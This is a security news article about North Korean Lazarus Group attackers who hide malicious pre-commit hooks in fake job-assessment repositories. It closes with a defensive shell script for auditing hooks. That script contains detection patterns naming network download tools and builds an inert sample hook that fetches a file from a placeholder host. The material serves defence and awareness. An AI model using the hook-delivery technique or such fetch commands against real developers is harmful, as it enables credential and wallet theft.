North Korean Hackers Weaponize Git Hooks to Deploy Cross-Platform
North Korean hackers have adopted a sophisticated new technique, embedding malware directly within the critical tools software developers use daily. Moving beyond conventional phishing emails and malicious links, these actors are now weaponizing Git hooks. These small, automated scripts, which execute during interactions with a code repository, are being exploited to deploy malicious code, marking a notable shift in targeting development workflows, as detailed
The campaign is a fresh evolution of a long-running operation known as Contagious Interview, linked to North Korea’s Lazarus Group. Attackers pose as fake recruiters on platforms like LinkedIn and reach out to software developers with promises of a legitimate job opportunity.
Victims are handed a coding assessment hosted on a GitHub repository, and once they clone that repo, the trap is already set in motion.
Researchers at OpenSourceMalware identified this technique and found that the malicious script is tucked inside the repository’s .githooks directory, specifically as a pre-commit hook. This means the payload fires the moment a developer tries to commit code — before the commit object is even written.
Most developers never question a repository received as part of a job test, which is exactly what makes this attack so difficult to detect in time.
Git Hooks as a Stealth Delivery Channel
The malware is built to work across multiple operating systems at once. Once triggered, the hook script checks what system the victim is running, then silently contacts a remote server to pull down the right payload.
Windows users receive one version, while macOS and Linux users get another. The goal stays the same across all platforms: steal crypto wallets, harvest sensitive credentials, and establish persistent access to the victim’s machine on behalf of the attacker.
Git hooks are a built-in feature of Git, the version control system used by practically every developer in the world. They are scripts that run automatically at certain points in the development process. In legitimate use, teams deploy them to enforce code quality checks before a commit goes through.
In this attack, the Lazarus Group plants a malicious pre-commit hook inside the repository handed to job candidates. The script is intentionally short and looks completely unremarkable on the surface. When a developer tries to make a change, the hook runs silently in the background, fingerprints the operating system, and contacts a remote server at a domain designed to look tied to legitimate developer infrastructure.
That server delivers a different payload depending on the victim’s system. On macOS and Linux, it serves a shell script. On Windows, it delivers a batch-compatible payload. Both versions install implants capable of stealing credentials, draining crypto wallets, and reporting back to the operators — all while the commit appears to succeed without any issue.
Cross-Platform Malware and Persistence
What makes this campaign stand out is how cleanly it runs across multiple platforms. Most malware is built with one operating system in mind, but this attack delivers a tailored payload to macOS, Linux, and Windows users from a single entry point. That level of flexibility points to an experienced, well-resourced group that invests heavily in keeping its campaigns active.
The implants delivered in this campaign belong to malware families the Lazarus Group has used in earlier operations, including BeaverTail and InvisibleFerret. These tools support keylogging, remote access, browser data theft, and file exfiltration. Researchers have also noted the use of post-checkout hooks, which fire every time a developer switches branches, giving the malware multiple chances to re-execute without any visible user action.
Developers and security teams can take concrete steps to reduce their exposure. Any repository received through a job process or from an unfamiliar source should be treated as hostile until verified. Inspecting the .githooks directory before opening a project, running unknown repositories inside isolated virtual machines with no saved credentials, and adopting organization-wide Git hook inspection policies are all meaningful defenses. Reporting suspicious pre-commit hook patterns to threat intelligence platforms also helps the wider security community respond much faster.
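The inspection step above, as an added example that is not code from the article or from the researchers it cites, written as a POSIX shell audit script. Git only runs hooks shipped in a repository's .githooks/ directory when core.hooksPath points there, so the script reads that setting from .git/config (without invoking git inside the untrusted checkout) alongside the stock .git/hooks/ location; the command patterns it matches are assumptions (generic heuristics), not indicators from the page, and the sample repository it builds is constructed and inert.

```shell
#!/bin/sh
# Added example, not code from the article or from OpenSourceMalware: audit a
# freshly cloned repository's hooks BEFORE opening it or committing in it.
# Flags hook scripts that download from the network and counts OS-detection
# lines alongside. NET_RE/OS_RE are assumed heuristics, not page indicators.
NET_RE='curl|wget|Invoke-WebRequest|iwr |bitsadmin|certutil|urllib|nc '
OS_RE='uname|OSTYPE|\$env:OS|sw_vers|systeminfo|platform\.system'

# Read core.hooksPath straight from .git/config rather than running git in an
# untrusted checkout (assumption: a standard "[core]" section layout).
hooks_path() {
    sed -n 's/^[[:space:]]*hooksPath[[:space:]]*=[[:space:]]*//p' \
        "$1/.git/config" 2>/dev/null | head -n 1
}

# audit_git_hooks <repo_dir>: prints one line per suspicious hook; returns 1 if any.
audit_git_hooks() {
    repo=$1; found=0
    hp=$(hooks_path "$repo")
    case "$hp" in ""|/*) extra=$hp ;; *) extra="$repo/$hp" ;; esac
    case "$extra" in "$repo/.githooks"|"$repo/.git/hooks") extra= ;; esac  # avoid double scan
    [ -n "$hp" ] && printf 'NOTE core.hooksPath=%s (repo-shipped hooks are active)\n' "$hp"
    for dir in "$repo/.githooks" "$repo/.git/hooks" "$extra"; do
        [ -n "$dir" ] && [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] || continue
            case "$f" in *.sample) continue ;; esac   # Git's stock samples are inert
            net=$(grep -Ec "$NET_RE" "$f" || true)
            os=$(grep -Ec "$OS_RE" "$f" || true)
            if [ "$net" -gt 0 ]; then
                found=1
                printf 'SUSPICIOUS %s: %s network line(s), %s OS-detection line(s)\n' "$f" "$net" "$os"
            fi
        done
    done
    return "$found"
}

# make_sample_repo <dir>: builds a CONSTRUCTED, inert repository layout mirroring
# the report (hook in .githooks/, activated via core.hooksPath). Nothing is executed.
make_sample_repo() {
    mkdir -p "$1/.githooks" "$1/.git/hooks"
    printf '[core]\n\thooksPath = .githooks\n' > "$1/.git/config"
    printf '#!/bin/sh\n# constructed sample, never run\ncase "$(uname -s)" in\n' > "$1/.githooks/pre-commit"
    printf 'Darwin|Linux) curl -fsSL https://placeholder.invalid/p -o /tmp/p ;;\nesac\n' >> "$1/.githooks/pre-commit"
    printf '#!/bin/sh\nexec npx eslint --quiet .\n' > "$1/.git/hooks/pre-push.sample"
}

# Usage: audit_git_hooks /path/to/cloned/repo   (before 'git commit' or opening an IDE)
```

A non-zero exit is the signal to treat the checkout as hostile and open it only in an isolated VM, as the article recommends.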
Indicators of Compromise (IoCs):
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.